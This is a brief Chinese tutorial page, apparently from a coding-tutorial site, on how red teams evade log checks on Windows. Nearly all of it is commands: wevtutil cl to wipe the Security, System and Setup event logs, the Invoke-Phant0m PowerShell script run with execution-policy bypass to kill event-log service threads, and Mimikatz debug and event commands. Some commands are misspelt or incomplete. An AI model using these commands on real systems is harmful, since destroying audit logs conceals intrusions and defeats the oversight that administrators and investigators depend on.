Java教程

红队绕过日志检查

本文主要是介绍红队绕过日志检查,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
  • 命令:wevtutil cl 日志类型

     wevtutil cl security
     wevtutil cl Setup
     wevtutil cl System
     wevtutil cl Aplication
     wevtutil cl Forwarded Events
  • 使用Phantom 工具

    该脚本遍历事件日志服务进程(特定于svchost.exe)的线程堆栈,并标识事件日志线程以杀死事件日志服务线程。因此,系统将无法收集日志,同时,事件日志服务也正在运行。

     github:https://github.com/hlldz/Invoke-Phant0m
    1 powershell -ep bypass
    2  .\Invoke-Phant0m.ps1
  • Mimikatz

    1 privilege::debug
    2  event::

     

这篇关于红队绕过日志检查的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!